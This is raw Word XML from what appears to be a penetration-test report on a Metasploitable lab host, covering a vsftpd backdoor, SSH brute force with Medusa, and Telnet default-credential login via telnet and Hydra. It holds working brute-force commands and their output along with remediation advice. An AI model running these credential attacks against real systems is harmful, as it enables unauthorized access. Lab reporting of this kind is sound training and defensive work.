          <v:shape id="WS_Shape 61" type="Shape 61" style="position:absolute;left:0;text-align:left;margin-left:556.14pt;width:2.72pt;height:346.50pt;mso-position-horizontal-relative:page;margin-top:8pt;mso-position-vertical-relative:paragraph;z-index:-251657490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324.00pt;z-index:3869;mso-position-horizontal-relative:page;margin-top:7pt;mso-position-vertical-relative:paragraph;">
            <v:imagedata r:id="rId_DOoe" o:title="Image123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0,1095" coordsize="10065,6876" o:spt="12" path="m1090,1095l11155,1095l11155,7970l1090,7970">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 58" type="Shape 58" style="position:absolute;left:0;text-align:left;margin-left:53.50pt;width:505.23pt;height:345.78pt;mso-position-horizontal-relative:page;margin-top:-4pt;mso-position-vertical-relative:paragraph;z-index:-251657496" filled="t" fillcolor="#F0FAFF" stroked="f">
            <v:fill type="solid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" coordorigin="1095,7968" coordsize="10050,14" o:spt="12" path="m1095,7975l11145,7975">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 62" type="Shape 62" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:504.52pt;height:2.72pt;mso-position-horizontal-relative:page;margin-top:4pt;mso-position-vertical-relative:paragraph;z-index:3828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94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Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="107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20"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Impact: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Complete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root-level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system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compromise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via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unauthenticated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backdoor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="65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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Fix: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Upgrade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vsftpd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immediately.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backdoor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removed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later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releases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="64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6"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Harden: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Restrict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port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21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via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firewall.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Replace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FTP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SFTP/SCP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="64" w:after="0" w:line="227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5"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Monitor: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Alert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unexpected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listeners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appearing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"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port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6200.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="495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42"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="268" w:after="0" w:line="268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42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4.2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Port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8"/>
          <w:noProof/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:color w:val="#1B3A5C"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="71"/>
          <w:noProof/>
        </w:rPr>
        <w:t>—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SSH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(Brute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Force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1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2"/>
          <w:noProof/>
        </w:rPr>
        <w:t>via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Medusa)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3" coordorigin="1052,11091" coordsize="10141,10" o:spt="12" path="m1052,11096l11193,11096">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 363" type="Shape 363" style="position:absolute;left:0;text-align:left;margin-left:51.58pt;width:509.07pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:26pt;mso-position-vertical-relative:paragraph;z-index:3832" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="364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32" w:space="0" w:color="F4A261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002"/>
        <w:gridCol w:w="3683"/>
        <w:gridCol w:w="3678"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="386" w:hRule="exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="32" w:space="0" w:color="F4A261"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="F4A261" w:color="000000" w:val="clear"/>
            <w:tcW w:w="2002" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="6" w:after="0" w:line="221" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="0"/>
              <w:jc w:val="center"/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65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7"/>
                <w:noProof/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="F5F7FA" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="3683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Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:color w:val="#4A5568"/>
                <w:spacing w:val="5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CVSS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Score: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4A5568"/>
                <w:spacing w:val="2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="F5F7FA" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="3678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1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3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CVE: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7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N/A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noProof/>
              </w:rPr>
              <w:t>—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Weak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Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="41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Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="75" w:after="0" w:line="255" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="360" w:right="528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OpenSSH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accepts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password-based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authentication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system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retained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default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credentials.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dictionary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attack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using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Medusa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rapidly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identified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valid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credentials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within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seconds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="385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83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83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Exploitation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Steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="356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12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3" w:name="13"/>
    <w:bookmarkEnd w:id="13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5,1090" coordsize="9363,4840" o:spt="12" path="m1095,1090l10458,1090l10458,5930l1095,5930">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 58" type="Shape 58" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:470.17pt;height:244.00pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:-251657496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8" coordorigin="1080,1090" coordsize="29,4840" o:spt="12" path="m1095,1090l1095,5930">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 558" type="Shape 558" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:3.44pt;height:244.00pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:3838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9" coordorigin="1080,1080" coordsize="9373,10" o:spt="12" path="m1080,1085l10453,1085">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 559" type="Shape 559" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:3839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0" coordorigin="10453,1080" coordsize="10,4850" o:spt="12" path="m10458,1080l10458,5930">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 560" type="Shape 560" style="position:absolute;left:0;text-align:left;margin-left:521.67pt;width:2.48pt;height:244.48pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:3842" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="313" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="7232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Confirm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SSH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is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running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nmap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-sV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-p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22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192.168.50.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="4495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22/tcp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open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ssh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2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OpenSSH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4.7p1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Debian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8ubuntu1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Brute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force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with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Medusa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="8599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root@kali:~#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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>medusa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="2785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-h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192.168.50.3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-u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1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>msfadmin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-P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1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>/usr/share/wordlists/rockyou.txt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6"/>
          <w:noProof/>
        </w:rPr>
        <w:t>-M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  <w:t>ssh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="14" w:after="0" w:line="210" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="1534"/>
        <w:jc w:val="both"/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ACCOUNT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CHECK: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[ssh]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Host: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192.168.50.3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User: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msfadmin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1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Password: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msfadmin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ACCOUNT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FOUND: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[ssh]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Host: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192.168.50.3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User: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msfadmin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Password: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msfadmin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[SUCCESS]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="563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Connect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using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discovered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credentials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ssh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="7" w:after="0" w:line="210" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="6659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3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-o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HostKeyAlgorithms=+ssh-rsa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msfadmin@192.168.50.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="5176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msfadmin@192.168.50.3's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password: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msfadmin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msfadmin@metasploitable:~$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="5176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5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1" coordorigin="1080,5930" coordsize="9373,10" o:spt="12" path="m1080,5935l10453,5935">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 561" type="Shape 561" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:8pt;mso-position-vertical-relative:paragraph;z-index:3846" filled="f" stroked="t" strokeweight="0.48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2" coordorigin="1090,6367" coordsize="10065,4845" o:spt="12" path="m1090,6367l11155,6367l11155,11211l1090,11211">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 562" type="Shape 562" style="position:absolute;left:0;text-align:left;margin-left:53.50pt;width:505.23pt;height:244.23pt;mso-position-horizontal-relative:page;margin-top:6pt;mso-position-vertical-relative:paragraph;z-index:-251657462" filled="t" fillcolor="#F0FAFF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3" coordorigin="1078,6357" coordsize="14,4854" o:spt="12" path="m1085,6357l1085,11211">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 563" type="Shape 563" style="position:absolute;left:0;text-align:left;margin-left:52.90pt;width:2.72pt;height:244.71pt;mso-position-horizontal-relative:page;margin-top:5pt;mso-position-vertical-relative:paragraph;z-index:3852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4" coordorigin="1095,6355" coordsize="10050,14" o:spt="12" path="m1095,6362l11145,6362">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 564" type="Shape 564" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:504.52pt;height:2.72pt;mso-position-horizontal-relative:page;margin-top:5pt;mso-position-vertical-relative:paragraph;z-index:3854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5" coordorigin="11143,6357" coordsize="14,4854" o:spt="12" path="m11150,6357l11150,11211">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 565" type="Shape 565" style="position:absolute;left:0;text-align:left;margin-left:556.14pt;width:2.72pt;height:244.71pt;mso-position-horizontal-relative:page;margin-top:5pt;mso-position-vertical-relative:paragraph;z-index:-251657456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222.00pt;z-index:3867;mso-position-horizontal-relative:page;margin-top:4pt;mso-position-vertical-relative:paragraph;">
            <v:imagedata r:id="rId_w4iL" o:title="Image126"/>
          </v:shape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6" coordorigin="1095,11209" coordsize="10050,14" o:spt="12" path="m1095,11216l11145,11216">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 566" type="Shape 566" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:504.52pt;height:2.72pt;mso-position-horizontal-relative:page;margin-top:8pt;mso-position-vertical-relative:paragraph;z-index:3862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372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Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="107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20"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Impact: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Unauthorized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interactive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shell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access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under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msfadmin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account.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="65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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Fix: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Enforce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SSH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key-based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authentication.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Disable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PasswordAuthentication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sshd_config.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32" w:after="0" w:line="260" w:lineRule="exact"/>
        <w:ind w:firstLine="-360" w:left="1080" w:right="1059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111"/>
          <w:noProof/>
        </w:rPr>
        <w:t>• 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6"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Harden: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Deploy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fail2ban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block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IPs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after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repeated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failures.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Change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default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credentials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immediately.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="59" w:after="0" w:line="227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6"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Advanced: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Move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SSH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non-standard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port.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Disable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login.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="495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34"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="268" w:after="0" w:line="268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34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4.3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Port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7"/>
          <w:noProof/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:color w:val="#1B3A5C"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="76"/>
          <w:noProof/>
        </w:rPr>
        <w:t>—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Telnet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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>(Cleartext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"/>
          <w:noProof/>
        </w:rPr>
        <w:t>+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Default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Credentials)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20" coordorigin="1052,14587" coordsize="10141,10" o:spt="12" path="m1052,14592l11193,14592">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 920" type="Shape 920" style="position:absolute;left:0;text-align:left;margin-left:51.58pt;width:509.07pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:26pt;mso-position-vertical-relative:paragraph;z-index:3866" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="184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13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4" w:name="14"/>
    <w:bookmarkEnd w:id="14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425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358"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="32" w:space="0" w:color="F4A261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002"/>
        <w:gridCol w:w="3683"/>
        <w:gridCol w:w="3678"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="382" w:hRule="exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="32" w:space="0" w:color="F4A261"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="F4A261" w:color="000000" w:val="clear"/>
            <w:tcW w:w="2002" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="1" w:after="0" w:line="221" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="0"/>
              <w:jc w:val="center"/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65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7"/>
                <w:noProof/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="F5F7FA" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="3683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Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:color w:val="#4A5568"/>
                <w:spacing w:val="5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CVSS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Score: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4A5568"/>
                <w:spacing w:val="2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="F5F7FA" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="3678" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="221" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="-20"/>
              <w:jc w:val="center"/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1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3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CVE: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7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N/A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noProof/>
              </w:rPr>
              <w:t>—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Insecure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Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="42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Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="0" w:line="255" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="360" w:right="563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Telnet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is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legacy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protocol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that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transmits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all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7"/>
          <w:noProof/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:spacing w:val="65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including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8"/>
          <w:noProof/>
        </w:rPr>
        <w:t>passwords</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:spacing w:val="66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plaintext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over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network.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trivially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susceptible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credential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sniffing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brute-force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attacks.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Combined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default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credentials,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this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represents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an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easily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exploitable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entry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point.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="364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66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66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Method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42"/>
          <w:noProof/>
        </w:rPr>
        <w:t>1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Banner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Capture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Direct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Login</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="115" w:after="0" w:line="220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#333333"/>
          <w:spacing w:val="-9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Telnet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banner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itself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advertises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default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credentials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(msfadmin/msfadmin).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="32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33" coordorigin="1095,4969" coordsize="9363,2261" o:spt="12" path="m1095,4969l10458,4969l10458,7231l1095,7231">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 433" type="Shape 433" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:470.17pt;height:115.07pt;mso-position-horizontal-relative:page;margin-top:16pt;mso-position-vertical-relative:paragraph;z-index:-251657460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8" coordorigin="1080,4969" coordsize="29,2261" o:spt="12" path="m1095,4969l1095,7231">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 618" type="Shape 618" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:3.44pt;height:115.07pt;mso-position-horizontal-relative:page;margin-top:16pt;mso-position-vertical-relative:paragraph;z-index:3862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9" coordorigin="1080,4960" coordsize="9373,10" o:spt="12" path="m1080,4965l10453,4965">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 619" type="Shape 619" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:16pt;mso-position-vertical-relative:paragraph;z-index:3863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0" coordorigin="10453,4960" coordsize="10,2271" o:spt="12" path="m10458,4960l10458,7231">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 620" type="Shape 620" style="position:absolute;left:0;text-align:left;margin-left:521.67pt;width:2.48pt;height:115.55pt;mso-position-horizontal-relative:page;margin-top:16pt;mso-position-vertical-relative:paragraph;z-index:3866" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="192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root@kali:~#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="19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telnet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192.168.50.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="4" w:after="0" w:line="215" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="4380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Trying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192.168.50.3...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Connected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192.168.50.3.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Login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with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msfadmin/msfadmin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get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started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metasploitable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2"/>
          <w:noProof/>
        </w:rPr>
        <w:t>login:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="9054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msfadmin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Password:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="7" w:after="0" w:line="210" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="7115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msfadmin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msfadmin@metasploitable:~$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1" coordorigin="1080,7231" coordsize="9373,10" o:spt="12" path="m1080,7236l10453,7236">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 621" type="Shape 621" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:-2pt;mso-position-vertical-relative:paragraph;z-index:3870" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D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2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14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5" w:name="15"/>
    <w:bookmarkEnd w:id="15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078,1080" coordsize="14,7188" o:spt="12" path="m1085,1080l1085,8268">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 59" type="Shape 59" style="position:absolute;left:0;text-align:left;margin-left:52.90pt;width:2.72pt;height:361.38pt;mso-position-horizontal-relative:page;margin-top:8pt;mso-position-vertical-relative:paragraph;z-index:3818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095,1078" coordsize="10050,14" o:spt="12" path="m1095,1085l11145,1085">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 60" type="Shape 60" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:504.52pt;height:2.72pt;mso-position-horizontal-relative:page;margin-top:7pt;mso-position-vertical-relative:paragraph;z-index:3820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1143,1080" coordsize="14,7188" o:spt="12" path="m11150,1080l11150,8268">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 61" type="Shape 61" style="position:absolute;left:0;text-align:left;margin-left:556.14pt;width:2.72pt;height:361.38pt;mso-position-horizontal-relative:page;margin-top:8pt;mso-position-vertical-relative:paragraph;z-index:-251657490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339.00pt;z-index:3868;mso-position-horizontal-relative:page;margin-top:7pt;mso-position-vertical-relative:paragraph;">
            <v:imagedata r:id="rId_6ywF" o:title="Image131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0,1095" coordsize="10065,7178" o:spt="12" path="m1090,1095l11155,1095l11155,8273l1090,8273">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 58" type="Shape 58" style="position:absolute;left:0;text-align:left;margin-left:53.50pt;width:505.23pt;height:360.90pt;mso-position-horizontal-relative:page;margin-top:-4pt;mso-position-vertical-relative:paragraph;z-index:-251657496" filled="t" fillcolor="#F0FAFF" stroked="f">
            <v:fill type="solid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" coordorigin="1095,8266" coordsize="10050,14" o:spt="12" path="m1095,8273l11145,8273">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 62" type="Shape 62" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:504.52pt;height:2.72pt;mso-position-horizontal-relative:page;margin-top:7pt;mso-position-vertical-relative:paragraph;z-index:3828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37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5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Method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42"/>
          <w:noProof/>
        </w:rPr>
        <w:t>2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Hydra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Brute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Force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+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Metasploit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Session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Upgrade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1" coordorigin="1095,9281" coordsize="9363,5272" o:spt="12" path="m1095,9281l10458,9281l10458,14553l1095,14553">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 111" type="Shape 111" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:470.17pt;height:265.60pt;mso-position-horizontal-relative:page;margin-top:27pt;mso-position-vertical-relative:paragraph;z-index:-251657480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6" coordorigin="1080,9281" coordsize="29,5272" o:spt="12" path="m1095,9281l1095,14553">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 446" type="Shape 446" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:3.44pt;height:265.60pt;mso-position-horizontal-relative:page;margin-top:27pt;mso-position-vertical-relative:paragraph;z-index:3856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7" coordorigin="1080,9272" coordsize="9373,10" o:spt="12" path="m1080,9276l10453,9276">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 447" type="Shape 447" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:26pt;mso-position-vertical-relative:paragraph;z-index:3857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8" coordorigin="10453,9272" coordsize="10,5282" o:spt="12" path="m10458,9272l10458,14553">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 448" type="Shape 448" style="position:absolute;left:0;text-align:left;margin-left:521.67pt;width:2.48pt;height:266.08pt;mso-position-horizontal-relative:page;margin-top:26pt;mso-position-vertical-relative:paragraph;z-index:3860" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="228" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="6320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Brute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force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Telnet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credentials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6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hydra</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="7" w:after="0" w:line="210" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="7346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-l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msfadmin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-p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1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>msfadmin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telnet://192.168.50.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="2215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[23][telnet]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host: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192.168.50.3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login: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msfadmin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password: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msfadmin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Upgrade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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>via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Metasploit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scanner</w:t>
